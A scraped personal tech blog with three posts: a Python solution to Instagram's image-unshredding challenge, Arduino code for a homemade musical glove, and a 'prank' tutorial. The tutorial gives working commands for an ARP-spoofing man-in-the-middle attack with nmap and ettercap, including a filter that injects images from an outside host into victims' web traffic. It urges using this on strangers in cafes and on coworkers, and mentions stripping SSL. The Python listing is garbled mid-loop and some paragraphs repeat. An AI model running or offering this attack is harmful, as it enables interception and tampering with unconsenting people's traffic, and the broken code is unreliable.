My Solution to The Instagram Engineering Challenge
Instagram introduced an Engineering Challenge called the “Unshredder”. You can View the challenge on their page here.
To sum it up, they want you to create software that can take an image shredded by a paper shredder, and unshred it.
On their blog, they state that this is the way to get a job at Instagram… They also give you a free Instagram t-shirt even if you don’t want to work there. Pretty cool. (Please don’t submit my code to Instagram and try to get a job)
They want you to take any given image that’s shredded like this:
and fix it so it looks like this:
Sounds fun. This is no challenge if I’m going to do it in PHP and GD. To be honest, I’m getting real bored of PHP and I’ve been wanting to get some Python practice in. I read one and a half Python books, so I figured this would be a perfect opportunity to get more comfortable with the language. Python is actually pretty fun. I like the fact that it’s a procedural language, object-oriented language, and a functional language all in one. My solution is not elegant (as I’m still learning Python), but it works!
from PIL import Image
import ImageOps
image = Image.open("TokyoPanoramaShredded.png")
data = list(image.getdata())
width, height = image.size
NUMBER_OF_COLUMNS = 20
def get_pixel_value(x, y):
pixel = data[y * width + x]
return pixel
def compare_strips(column1,column2):
dif = rdif = gdif = bdif = 0
x1 = ((width/NUMBER_OF_COLUMNS)*column1)-1
x2 = (width/NUMBER_OF_COLUMNS)*(column2-1)
for y in range(0,height):
data1 = get_pixel_value(x1,y)
data2 = get_pixel_value(x2,y)
rdif += abs(data1[0]-data2[0])
gdif += abs(data1[1]-data2[1])
bdif += abs(data1[2]-data2[2])
return (rdif+gdif+bdif)/3
def compare_striptops(column1,column2):
x1 = ((width/NUMBER_OF_COLUMNS)*column1)-1
x2 = (width/NUMBER_OF_COLUMNS)*(column2-1)
data1 = get_pixel_value(x1,0)
data2 = get_pixel_value(x2,0)
rdif = abs(data1[0]-data2[0])
gdif = abs(data1[1]-data2[1])
bdif = abs(data1[2]-data2[2])
return (rdif+gdif+bdif)/3
# find adjacent strips
strips = []
for strip1 in range(1,NUMBER_OF_COLUMNS+1):
strips.append((0,0,100000))
for strip2 in range(1,NUMBER_OF_COLUMNS+1):
if (strip1 != strip2):
temp = strip1,strip2,compare_strips(strip1,strip2)
if (temp[2] seam[1]):
seam = temp
for i in range(0,seam[0]):
temp = sortedstrips.pop(0)
sortedstrips.append(temp)
# Create a new image of the same size as the original
# and copy a region into the new image
unshredded = Image.new("RGBA", image.size)
shred_width = unshredded.size[0]/NUMBER_OF_COLUMNS
for i in range(0,NUMBER_OF_COLUMNS):
shred_number = sortedstrips[i][0]
x1, y1 = (shred_width * shred_number)-shred_width, 0
x2, y2 = x1 + shred_width, height
source_region = image.crop((x1, y1, x2, y2))
destination_point = (i * shred_width, 0)
unshredded.paste(source_region, destination_point)
# Output the new image
unshredded.save("unshredded.jpg", "JPEG")
Feel free to download it, modify it, improve it here.
OCTOBER 30, 2011
My Homemade Nintendo Powerglove
Remember the old Nintendo powerglove? Of course you do. Well, I’m here to bring it back. With just an arduino, a piezo transducer, flex sensors, 10k Ohm resistors, some wires, rubber bands, a glove, and some C programming knowledge, I am able to recreate the old school Nintendo powerglove…. except this time, I made it into an electronic musical instrument. I mean… do you ever have a melody stuck in your head and you can’t help but to play the imaginary piano keys with your fingers? Well, this is what inspired me to do this. LOL. Seriously.
Yeah I know… you’re probably thinking 1) this looks ugly and 2) I should use this for something cooler. You are absolutely correct, and this is just the beginning of my little powerglove project. Just wait until I finally receive my 3-axis accelerometer in the mail (I didn’t want to break apart a wii controller to do this)… I’m gonna do all sorts of things. What’s on my list?
- Use it to control a robotic arm
- Create an AIR keyboard or mouse (kind of like minority report… except you have to be wearing the glove.
- Use it to control the movement on video games
- The beginning of an ironman suit! (j/k… sort of)
- Create an AIR keyboard or mouse (kind of like minority report… except you have to be wearing the glove.
- Use it to control the movement on video games
- The beginning of an ironman suit! (j/k… sort of)
Well… enjoy the pictures and the video and the source code.
…. and HERE is my source code:
int potpin0 = 0;
int potpin1 = 1;
int potpin2 = 2;
int potpin3 = 3;
int potpin4 = 4;
int speakerPin = 7;
int val0, val1, val2, val3, val4;
int flexlow = 50;
int flexhigh = 300;
int flexminimum = 230;
void setup()
{
pinMode(speakerPin, OUTPUT);
}
void loop()
{
val0 = analogRead(potpin0);
val1 = analogRead(potpin1);
val2 = analogRead(potpin2);
val3 = analogRead(potpin3);
val4 = analogRead(potpin4);
if(val0 < flexminimum){
playTone(1915);
}
else if(val1 < flexminimum){
playTone(1700);
}
else if(val2 < flexminimum){
playTone(1519);
}
else if(val3 < flexminimum){
playTone(1432);
}
if(val4 < flexminimum){
playTone(1275);
}
}
void playTone(int note)
{
for (int i=0; i<100; i++)
{
digitalWrite(speakerPin, HIGH);
delayMicroseconds(note);
digitalWrite(speakerPin, LOW);
delayMicroseconds(note);
}
}
OCTOBER 13, 2011
Prank Hacking Your Co-workers for Fun
I have a funny prank/hack to pull at the office, Denny’s, Starbucks, etc. Anytime you are connected to a wireless access point, you can potentially target any victim on your network, run a man-in-the-middle attack, and manipulate their packets. For example, I used a filter to replace ALL occurrences of img src=” with img src=”http://www.cranklin.com/mickey.png”. What does this do? It replaces all images (loaded with the html img tag) on the victim’s web browser with an image of my liking. For our example here, I will use this awesome picture of Mickey Mouse (with my domain name advertised on it of course).
Here are some snapshots of the screen on another computer in the network.
The website you are seeing is www.nhm.org (Natural History Museum of Los Angeles). Surprise… Mickey Mouse is all over their website. You can get really creative with the filters. You can replace all the links with your own… you can turn off SSL encryption, you can even manipulate Instant Messenger messages and replace all messages with hate messages… etc. LOL.
As a matter of fact, while I was working at IdeaLab, I was testing my filters out on my victim, Shana. At that time, she was doing something on the email newsletter website and I was tampering with her packets. Though it didn’t work properly, she kept getting frustrated because the site wasn’t functioning correctly. The fact is, everytime I ran the filter, bizarre things would happen on the site…. and everytime I turned off the filter, the site would behave normal. I was trying real hard to keep a straight face and not bust up in laughter.
So how did I do it?
When you feel like being mischievous, connect your computer to a wireless access point. (Mac/Linux/Unix) run:
When you feel like being mischievous, connect your computer to a wireless access point. (Mac/Linux/Unix) run:
route -n
(Windows) run: ipconfig
and note the IP address of your gateway.
Find the local IP address of your victim. Running something like
nmap -sP 192.168.1.*
will help you do this. Note the IP address of your victim.
Now, we’re going run what we call a “man-in-the-middle attack”. This is done by ARP spoofing. The way it works is that we pretend to be the gateway. The victim will unknowingly direct all his/her packets to your PC rather than the gateway. Your PC forwards those packets to the gateway so the victim’s network connection never gets severed. To do this, first turn on packet forwarding by running
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
. (This will differ depending on your OS).
Now, to construct your filter. My filter file “mickeymouse.filter” looks like this:
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.cranklin.com/mickey.png\" ");
replace("IMG SRC=", "img src=\"http://www.cranklin.com/mickey.png\" ");
msg("Filter Ran.\n");
}
You need to compile it using ettercap’s filter compiler by running
Now, you’re ready to run the attack with this:
The first IP is the IP of your gateway. The second IP is the IP of your victim. Your wireless interface may also be different depending on your computer. In my case, it is eth1.
etterfilter mickeymouse.filter -o mickeymouse.ef
Now, you’re ready to run the attack with this:
sudo ettercap -i eth1 -T -q -F mickeymouse.ef -M arp:remote /192.168.1.1/ /192.168.1.101/
The first IP is the IP of your gateway. The second IP is the IP of your victim. Your wireless interface may also be different depending on your computer. In my case, it is eth1.
LOL. Very funny prank. Imagine messing with that stranger on his/her computer at Starbucks. I still have trouble making it work with gzip compression on some web servers. You can also do this same thing without targeting 1 victim at a time. Using a nifty tool called “airpwn”, you can intercept packets in the air and beat the webserver to the victims’ computers. The REAL packets will be out of sequence and therefore ignored.